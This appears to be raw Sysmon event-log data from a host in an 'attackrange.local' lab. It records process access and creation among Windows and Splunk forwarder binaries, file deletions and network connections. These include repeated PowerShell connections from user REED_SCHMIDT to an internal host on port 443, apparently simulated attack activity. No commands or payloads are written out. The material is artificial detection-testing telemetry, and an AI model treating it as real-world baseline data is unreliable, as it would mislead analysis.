18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.079{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E4E0CB1575BF1A316572FA3A5B8823,SHA256=D7EAA3EE3C39FD7A1CB6C666725E4A2263D19DB99E76041341220022B4CE5B94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:15.093{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71DEFBE7F2FC69870DB0A3AA788859A8,SHA256=BBD4622FA014A817782516788581E3F38335B2E909B600EF89C49A7D137F17B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:16.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5B8D46AE2D74553489FD5FE00A20715,SHA256=886DE5B5BF29D23227A4482C9E0B1BC925F787E38DE5DD63090904F5365B521B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:41.254{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56547-false10.0.1.12-8000- 23542300x800000000000000035083991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:17.138{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9844B8572042FCD9966B7BE4D377D54C,SHA256=78E7B311B623026F1EE6A13E467E72BF281001B9CBCE2A6019E8B8CD5193BC1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:18.156{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EFD7EC3420327BB4E7FBDE23EBB6458,SHA256=8D4077A280074DB23393F4766DAAC64D9F31BD4BAE89DB91ABC6125F9964B220,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:19.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D3F064E0008A111DCE16D2CE3FB50425,SHA256=46FAD5E6E8B9B5D3FC5843B87D7EF482DA2971DBFD340FB48914464C617B8315,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:19.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF7A08060B3ADC671399C0C4FBB5D6C,SHA256=E3D5647844E1B1575AD1EF969E9FF1CC9CA3731AC346E5BD2036DDE58229B3DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.553{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56548-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:20.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB576580DDB82E7503BA704AE0B2285,SHA256=ECA6EF10266394B92E8DBDC23F776AACED2ECC9C07BB7C7E4F21C18101D53B63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:21.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39E23F0EDA53E2793CBBB99BB2B01CA2,SHA256=07D402FB1F440973D0E0AB5DA385BC3BA542DBF0ABCBAFCFC38D90ED81EA9D40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:47.218{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56549-false10.0.1.12-8000- 23542300x800000000000000035083999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:22.219{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAF0512B8D59526DADE5708C828A3E6B,SHA256=7E562418C6DEF4CC024A067CDDF2D29CF4E5A9741CBD20FC092025B76C4AF7AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:48.566{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56550-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:23.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D138270C06C1B76B96304DBC89763E6D,SHA256=ED188EEBF7F4C96B2D64C99AB6FD9312BCB1DE02565F1795E7D5EDD9034D5B90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:23.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=191A4F049E11D3024CB1A22F417CC3E4,SHA256=A87E6C015F31CD89DDC886B17A14E626BA1D97C77E69D5E584DCF5D9925724DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:24.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DAC88258C02B344D62534B7B143D1A3,SHA256=09B88EAAFEF134F5B487ACE3D6728F58974ACA62D4857F81827CA9F28264C226,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:25.285{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00BE6DCCD7D377B73BC44953803E67B0,SHA256=F70EE4198BD9F3089D47B2062D0E3151E4DAA4DE30D76EB117A2B3C314EB6F9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:26.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C949B91EE3CDD65174F9C172E91A93F5,SHA256=5554A288B54D6C23FB703955B255DDA75DB588108ABFDB2E651D0491F732207A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:52.585{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56551-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:27.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8F08FB67F8257ADE8534ABB15783A000,SHA256=E37A5DD5315D1E51C9585318C4DD2EB464C31AD0475A3E32151C7FAC45C082A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:27.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1429029B24F86B93B7FEEE68BDC60D9C,SHA256=6196EC55B24295ED95F7EEF0CA6BBFE23A634AE358FCDC76F0911B5C92473264,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:53.047{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56552-false10.0.1.12-8000- 10341000x800000000000000035084027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.852{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D9C-613A-2A90-03000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.850{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.850{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.849{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.849{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.849{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D9C-613A-2A90-03000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.849{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D9C-613A-2A90-03000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.833{B81B27B7-4D9C-613A-2A90-03000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.485{B81B27B7-4D9C-613A-2990-03000000C801}64521464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D9C-613A-2990-03000000C801}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 